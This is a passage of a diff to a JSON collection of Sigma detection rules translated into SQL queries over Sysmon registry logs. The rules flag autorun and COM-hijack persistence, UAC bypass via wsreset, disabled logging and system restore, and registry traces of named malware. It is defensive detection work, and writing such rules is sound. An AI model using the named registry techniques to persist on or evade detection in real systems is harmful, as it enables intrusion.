An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') 
OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' 
ESCAPE '\\') AND ((TargetObject LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Registry Hide Function from User", - "id": "5a93eb65-dffa-4543-b761-94aa60098fb6", - "status": "test", - "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", + "status": "experimental", + "description": "Detects the modification of the registry to disable a system restore on the computer", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate admin script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideClock' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAHealth' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCANetwork' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAPower' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\HideSCAVolume' ESCAPE '\\') AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowInfoTip' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\ShowCompColor' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_hide_function_user.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Potential Persistence Using DebugPath", - "id": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", "status": "experimental", - "description": "Detects potential persistence using Appx DebugPath", - "author": "frack113", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ActivatableClasses\\\\Package\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\DebugPath' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject 
LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\PackagedAppXDebug\\\\Microsoft.%' ESCAPE '\\' AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_persistence_appx_debugger.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Change User Account Associated with the FAX Service", - "id": "e3fdf743-f05b-4051-990a-b66919be1743", - "status": "experimental", - "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", - "author": "frack113", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "status": "test", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ "attack.defense_evasion", + "attack.t1562.001", "attack.t1112" ], "falsepositives": [ 
@@ -33546,1169 +33295,1278 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_fax_change_service_user.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Disable Windows Security Center Notifications", - "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", - "status": "experimental", - "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' 
ESCAPE '\\')" ], - "filename": "registry_set_disable_security_center_notifications.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Enable Microsoft Dynamic Data Exchange", - "id": "63647769-326d-4dde-a419-b925cc0caf42", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", "status": "test", - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "author": "frack113", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1559.002" + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\Word\\\\Security\\\\AllowDDE' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLaunch' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Security\\\\DisableDDEServerLookup' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_office_enable_dde.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Potential 
Persistence Via COM Hijacking From Suspicious Locations", - "id": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "status": "experimental", - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1546.015" + "attack.t1547.001" ], "falsepositives": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CLASSES\\_ROOT\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_CURRENT\\_USER\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%\\\\LocalServer32\\\\(Default)' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE 
'\\' OR Details LIKE '%\\%appdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Changing RDP Port to Non Standard Number", - "id": "509e84b9-a71a-40e0-834f-05470369bd1e", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", "status": "test", - "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", - "author": "frack113", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.lateral_movement", + "attack.t1105" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + ], + "filename": "registry_event_apt_pandemic.yml" + }, + { + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_change_rdp_port.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Common Autorun Keys Modification", - "id": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + ], + "filename": "registry_event_disable_wdigest_credential_guard.yml" + }, + { + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": 
"277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", + "description": "Detects persistence registry keys for Recycle Bin", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1547.001" + "attack.t1547" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows CE Services\\\\AutoStart%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SYSTEM\\\\Setup\\\\CmdLine%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Ctf\\\\LangBarAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Command Processor\\\\Autorun%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Handler%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_apt_oceanlotus_registry.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", "tags": [ - 
